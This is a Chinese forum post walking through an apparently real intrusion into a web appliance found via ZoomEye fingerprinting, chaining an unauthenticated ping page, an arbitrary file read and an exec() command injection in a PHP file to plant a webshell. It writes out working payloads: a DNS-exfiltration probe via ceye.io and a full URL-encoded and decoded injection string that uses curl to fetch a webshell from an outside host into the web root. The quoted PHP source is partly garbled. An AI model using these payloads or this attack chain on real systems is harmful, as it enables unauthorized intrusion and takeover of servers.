admin 发表于 2022-3-31 01:39:59

Web安全之实战通过os命令注入漏洞getwebshell

**一、
** **寻找突破口**

**经过右键查看源代码发现系统的特征为:images/select_bg.png,去钟馗之眼搜索如图:**

!(data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")



**发现reporter和[Technology,
Inc.](https://www.zoomeye.org/searchResult?q=images%2Fselect_bg.png%20%2Bcountry:%22CN%22%20%2Btitle:%22Technology,%20Inc.%22&t=all)都采用这个特征,然后一看之前搞过这样的系统,有源代码,对照源代码目录发现了未授权访问页面。**

**地址为:**

[http://1.1.1.1//view/systemConfig/systemTool/ping/ping.php?text_target=&text_pingcount=5&text_packetsize=64](http://1.1.1.1/view/systemConfig/systemTool/ping/ping.php?text_target=&text_pingcount=5&text_packetsize=64)**,如图:**

!(data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")



**测试ping这里的功能,发现可以绕过ping正常功能执行命令,payload为:**

**`whoami`.1111.ceye.io** **,如图:**

!(data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")



**返回dns记录如图:**

!(data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")



**发现当前用户权限为root**

**一、
** **通过漏洞组合getwebshell**

**    ** **文章就按照挖洞顺序往下写,紧接着执行pwd命令获取web路径,如图:**

!(data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")



**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**

**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**

!(data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")

**Os** **命令注入存的处为:/var/www/html/view/Behavior/toQuery.php,这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的,通过任意文件查看漏洞,我们读取一下源代码**

!(data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")\


**源代码为:**

<?php
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
?>

<?php



session_start ();







if ($_GET ["objClass"] == "")



      exit ();



$param = $_REQUEST;







//echo "\n--------------------------\n";



//print_r($param);



//echo "\n--------------------------\n";



==
"getList" || $_GET ["method"] == "import" ||
$_GET ["method"] == "processAlarm") ](){



      $param
["user"] = $_SESSION ["s_userName"];



      $param
["lan"] = $_SESSION ["lan"];



      $param
["regUserpath"] = $_SESSION ["regUserpath"];



   



      exec (
"rm -rf /tmp/cache" );



      [$cmd = "/usr/local/php/bin/php ".$_SERVER
["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()



      $cmd .=
" " . $_GET ["objClass"];



      $cmd .=
" " . $_GET ["method"];



      $cmd .=
" " . base64_encode ( json_encode ( $param ) );



      ()



      exec ( $cmd . "
> /dev/null &" );





} else {



      require_once
($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");



      $obj = new
QueryInterface ();



      $instance =
$obj->getInstance ();



      $instance->invokeMethod
( $_GET ["objClass"], $_GET ["method"], $param );



}



exit ();



?>

**经常简单审计发现if ($_GET
["method"] == "getList" || $_GET ["method"] ==
"import" || $_GET ["method"] == "()"),如果method只要等于getList、import、processAlarm这其中一个,$cmd =
"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .
"()";cmd等于web绝对路径+ system/behavior/behavior_query.php,然后file_put_contents("/tmp/query_cmd",$cmd);**

**      exec ( $cmd
. "> /dev/null &" );** **给我们构造了一个命令注入的参数,这里直接造成了OS命令注入漏洞,下面看我演示**


!(data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")



**图中objClass=存在OS命令注入漏洞,我之前试图通过bash反弹shell,但是测试了一晚上没反弹成功,最后选择了curl下载webshell,payload如下:**

**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**

**我们用url解码如下:**

**|curl http://1.1.1.1/qYCwxRz1.zip -o
/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o
/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zip%20-o%20/var/www/html/images/suiji2.php)

**使用这么多管道符|就是要闭合payload,最后成功curl下载webshell如图:**


!(data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")




**三、总结**

**   ** **案例之所以最终获得webshell,很大程度上是取决于几个漏洞的组合,首先通过右键查看源代码找到目标系统使用的系统,因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面,通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径,其次,使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计,经过确认存在此漏洞,最后构造os命令执行payload,最终getwebshell,整个getwebshell过程就是一个漏洞的连环组合,渗透更多的时候是靠运气,如果这几个环节有一个环节漏洞不存在或者没挖到,可能导致getwebshell失败。**

**   ** **综上所述,运气与挖洞功底同等重要,谢谢观看** **! **
页: [1]
查看完整版本: Web安全之实战通过os命令注入漏洞getwebshell